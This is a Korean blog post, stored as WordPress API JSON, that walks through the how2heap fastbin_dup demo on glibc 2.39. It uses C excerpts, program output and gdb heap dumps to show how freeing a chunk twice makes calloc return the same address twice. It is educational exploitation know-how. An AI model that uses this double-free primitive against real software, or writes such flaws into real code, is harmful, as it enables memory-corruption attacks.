{"id":3554,"date":"2025-05-11T16:17:57","date_gmt":"2025-05-11T07:17:57","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3554"},"modified":"2025-05-11T16:18:28","modified_gmt":"2025-05-11T07:18:28","slug":"how2heap-glibc2-39-fastbin_dup","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3554","title":{"rendered":"[how2heap\/glibc2.39] fastbin_dup"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">\ud658\uacbd<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\uc694\uc57d<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin \ubc94\uc704\ub85c \ud560\ub2f9\ud558\uc5ec tcache\ub97c 7\ubc88 fill\ud574\uc57c, \ub2e4\uc74c\ubc88\uc5d0 \ud560\ub2f9\uc2dc fastbin\uc73c\ub85c \ub118\uc5b4\uac10.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin \ud55c\ubc88 \ud560\ub2f9\ud558\uace0(\uc5ec\uae30\uae4c\uc9c0 8\ubc88 \ud560\ub2f9\ud568)<br>\uadf8 \uc774\uc804 tcache \ud560\ub2f9\uc8fc\uc18c\ub294 free\ud574\uc11c \uc815\ub9ac\ud55c\ub2e4. (1~7\ubc88\uca30 \ud560\ub2f9\uc8fc\uc18c \uc815\ub9ac)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\uc774\uc81c fastbin \ubc94\uc704\ub85c 3\ubc88 \ud560\ub2f9\ud558\uace0, 1, 2, 1\ubc88\uc9f8 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ucc28\ub840\ub85c free\ud558\uace0\ub098\uc11c,<\/strong><br><strong>fastbin \ubc94\uc704\ub85c \ub2e4\uc2dc 3\ubc88 \ud560\ub2f9\ud560\ub54c 1, 3\ubc88\uc9f8\uc5d0\uc11c \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c\ud560 \uc218 \uc788\uc74c \u3147\u3147<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin\uc740 \uccad\ud06c \ud06c\uae30(\uba54\ud0c0\ub370\uc774\ud130 \ud3ec\ud568)\uac00 16\ubc14\uc774\ud2b8 \uc774\uc0c1 128\ubc14\uc774\ud2b8 \uc774\ud558\uc778 \ud560\ub2f9 \uc694\uccad\uc2dc \ucc98\ub9ac\ud568.<br>malloc(8)\uc73c\ub85c \uc2dc\uc5f0\ud568.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ub0b4\uc6a9<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">tcache\ub294 <strong>24~1,032\ubc14\uc774\ud2b8(\uba54\ud0c0\ub370\uc774\ud130 \ud3ec\ud568)<\/strong> \ud06c\uae30\uc758 \uccad\ud06c\ub97c <strong>16\ubc14\uc774\ud2b8 \uac04\uaca9<\/strong>\uc73c\ub85c <strong>64\uac1c bin<\/strong>, <br>\uac01 bin\ub2f9 <strong>7\uac1c<\/strong>\uc529 \ubcf4\uad00\ud558\ub294 \uc2a4\ub808\ub4dc \ub85c\uceec \uce90\uc2dc. <code>malloc(8)<\/code>\uc740 24\ubc14\uc774\ud2b8 \uccad\ud06c\ub85c, <br>tcache \ucd5c\uc18c \ud06c\uae30\uc5d0 \ub531 \ub9de\ucdb0 \uc800\uc7a5\ub428.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uac01 tache bin\uc740 \ucd5c\ub300 <strong>7\uac1c<\/strong>\uc758 \uccad\ud06c\ub9cc \ubcf4\uad00\ud558\uba70, \ucd08\uacfc\ub41c \uccad\ud06c\ub294 fastbin\uc73c\ub85c \ub118\uaca8\uc9c0\ub294\ub370, <br>fastbin\uc740 <strong>\uccad\ud06c \ud06c\uae30(\uba54\ud0c0\ub370\uc774\ud130 \ud3ec\ud568)\uac00 16\ubc14\uc774\ud2b8 \uc774\uc0c1 128\ubc14\uc774\ud2b8 \uc774\ud558<\/strong>\uc778 \ud560\ub2f9 \uc694\uccad\uc2dc \ucc98\ub9ac\ub428.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc704 \ud2b9\uc774\uc810\uc744 \ucc38\uace0\ud558\uace0, <br>\ub2e4\uc74c\uc740 fastbin\uc744 \ud65c\uc6a9\ud55c \ub354\ube14-\uc5b4\ud0dd \uc2dc\uc5f0 \ucf54\ub4dc\uc774\ub2e4..<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">fastbin\uc73c\ub85c \ud560\ub2f9\ud558\uae30 \uc704\ud5e4 7\uac1c tcache bin\uc744 \ucc44\uc6c0. 8\ubc88\uca30\ubd80\ud130\ub294 fastbin\uc73c\ub85c \ud560\ub2f9\ubc1b\uc73c\uba70, \ub098\uba38\uc9c0 tcache bin\ub4e4\uc744 free\uc2dc\ud0b4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\ud6c4, 8\ud06c\uae30\ub9cc\ud07c a, b, c \uccad\ud06c\uc5d0 \uac01\uac01 \ud799\uc744 3\ubc88 \ud560\ub2f9\ud568.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">        setbuf(stdout, NULL);\n\n        printf(\"This file demonstrates a simple double-free attack with fastbins.\\n\");\n\n        printf(\"Fill up tcache first.\\n\");\n        void *ptrs[8];\n        for (int i=0; i&lt;8; i++) {\n                ptrs[i] = malloc(8);\n        }\n        for (int i=0; i&lt;7; i++) {\n                free(ptrs[i]);\n        }\n\n        printf(\"Allocating 3 buffers.\\n\");\n        int *a = calloc(1, 8);\n        int *b = calloc(1, 8);\n        int *c = calloc(1, 8);\n\n        printf(\"1st calloc(1, 8): %p\\n\", a);\n        printf(\"2nd calloc(1, 8): %p\\n\", b);\n        printf(\"3rd calloc(1, 8): %p\\n\", c);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">This file demonstrates a simple double-free attack with fastbins.\nFill up tcache first.\nAllocating 3 buffers.\n1st calloc(1, 8): 0x5555555593a0\n2nd calloc(1, 8): 0x5555555593c0\n3rd calloc(1, 8): 0x5555555593e0<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk\n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"270\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-13.png\" alt=\"\" class=\"wp-image-3555\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-13.png 675w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-13-300x120.png 300w\" sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">2.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">a \uccad\ud06c\ub97c free \uc2dc\ud0b4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">a \uccad\ud06c\uc5d0 safe-link \uc801\uc6a9\ub41c fd\uac12\uc774 \uc800\uc7a5\ub428 \u3147\u3147<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>fd(orig) = 0<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">printf(\"Freeing the first one...\\n\");\nfree(a);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Freeing the first one...<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Freed        0x555555559              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559390 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"729\" height=\"338\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-14.png\" alt=\"\" class=\"wp-image-3556\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-14.png 729w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-14-300x139.png 300w\" sizes=\"auto, (max-width: 729px) 100vw, 729px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">3.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\ub9cc\uc57d \ud55c\ubc88\ub354 a \uccad\ud06c \ucd94\uc18c\uc778 0x5555555593a0\uc744 free\ud558\uac8c \ub418\uba74 \ucda9\ub3cc \ubc1c\uc0dd\ud568. <br>\uc65c\ub0d0\uba74, free list\uc758 top\uc5d0 \ud574\ub2f9\ub418\uae30 \ub584\ubb38\uc774\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ub300\uc2e0\uc5d0 \uc774\ubc88\uc5d0\ub294 b \uccad\ud06c\ub97c free\ud568.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>fd(orig) = 0x555555559390<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">printf(\"If we free %p again, things will crash because %p is at the top of the free list.\\n\", a, a);\n        \/\/ free(a);\n\n        printf(\"So, instead, we'll free %p.\\n\", b);\n        free(b);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">If we free 0x5555555593a0 again, things will crash because 0x5555555593a0 is at the top of the free list.\nSo, instead, we'll free 0x5555555593c0.<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Freed        0x555555559              None\n0x5555555593b0      0x0                 0x20                 Freed     0x55500000c6c9              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x5555555593b0 --> 0x555555559390 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"793\" height=\"354\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15.png\" alt=\"\" class=\"wp-image-3557\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15.png 793w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15-300x134.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-15-768x343.png 768w\" sizes=\"auto, (max-width: 793px) 100vw, 793px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">4.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">free list\uc758 head\uac00 \uc544\ub2c8\uae30 \ub54c\ubb38\uc5d0, \uc774\uc81c a \uccad\ud06c\ub97c \ud55c\ubc88\ub354 free \ud560 \uc218 \uc788\uc5b4 \ud574\ubcf8\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uadf8\ub7ec\uba74, a\uccad\ud06c\uc758 fd(orig)\ub294 0x5555555593b0\uc778 b\uccad\ud06c\ub97c \uac00\ub9ac\ud0a8\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uc774\uc81c freelist\uc5d0\ub294 a, b, a \uccad\ud06c \uc8fc\uc18c\uac00 \ub4e4\uc5b4\uc788\uc5b4\uc11c, 3\ubc88 malloc\uc744 \ud558\uba74\uc740 <br>a\uccad\ud06c \uc8fc\uc18c\uc778 0x5555555593a0\ub97c 2\ubc88 \ud560\ub2f9\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">printf(\"Now, we can free %p again, since it's not the head of the free list.\\n\", a);\n        free(a);\n\n        printf(\"Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\\n\", a, b, a, a);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Now, we can free 0x5555555593a0 again, since it's not the head of the free list.\nNow the free list has [ 0x5555555593a0, 0x5555555593c0, 0x5555555593a0 ]. If we malloc 3 times, we'll get 0x5555555593a0 twice!<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Freed     0x55500000c6e9              None\n0x5555555593b0      0x0                 0x20                 Freed     0x55500000c6c9              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559390 --> 0x5555555593b0 --> 0x555555559390 (overlap chunk with 0x555555559390(freed) )\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"798\" height=\"361\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16.png\" alt=\"\" class=\"wp-image-3558\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16.png 798w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16-300x136.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-16-768x347.png 768w\" sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">5.<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">1, 3\ubc88\uc9f8 \ud560\ub2f9\ubc1b\ub294 \uc8fc\uc18c\uac00 \uc774\uc81c \uc11c\ub85c \uac19\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\ucf54\ub4dc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">a = calloc(1, 8);\n        b = calloc(1, 8);\n        c = calloc(1, 8);\n        printf(\"1st calloc(1, 8): %p\\n\", a);\n        printf(\"2nd calloc(1, 8): %p\\n\", b);\n        printf(\"3rd calloc(1, 8): %p\\n\", c);<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\uacb0\uacfc:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">1st calloc(1, 8): 0x5555555593a0\n2nd calloc(1, 8): 0x5555555593c0\n3rd calloc(1, 8): 0x5555555593a0<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\n0x5555555593d0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559 (invaild memory)\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593f0 (size : 0x20c10)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"676\" height=\"294\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-17.png\" alt=\"\" class=\"wp-image-3559\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-17.png 676w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-17-300x130.png 300w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\ud658\uacbd Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64 \uc694\uc57d fastbin \ubc94\uc704\ub85c \ud560\ub2f9\ud558\uc5ec tcache\ub97c 7\ubc88 fill\ud574\uc57c, \ub2e4\uc74c\ubc88\uc5d0 \ud560\ub2f9\uc2dc fastbin\uc73c\ub85c \ub118\uc5b4\uac10. fastbin \ud55c\ubc88 \ud560\ub2f9\ud558\uace0(\uc5ec\uae30\uae4c\uc9c0 8\ubc88 \ud560\ub2f9\ud568)\uadf8 \uc774\uc804 tcache \ud560\ub2f9\uc8fc\uc18c\ub294 free\ud574\uc11c \uc815\ub9ac\ud55c\ub2e4. (1~7\ubc88\uca30 \ud560\ub2f9\uc8fc\uc18c \uc815\ub9ac) \uc774\uc81c fastbin \ubc94\uc704\ub85c 3\ubc88 \ud560\ub2f9\ud558\uace0, 1, 2, 1\ubc88\uc9f8 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ucc28\ub840\ub85c free\ud558\uace0\ub098\uc11c,fastbin \ubc94\uc704\ub85c \ub2e4\uc2dc 3\ubc88 \ud560\ub2f9\ud560\ub54c 1, 3\ubc88\uc9f8\uc5d0\uc11c \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c\ud560 \uc218&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3554\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[how2heap\/glibc2.39] fastbin_dup<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[52],"tags":[53,35,51,25],"class_list":["post-3554","post","type-post","status-publish","format-standard","hentry","category-how2heap","tag-fastbin","tag-heap","tag-how2heap","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3554"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3554\/revisions"}],"predecessor-version":[{"id":3561,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3554\/revisions\/3561"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}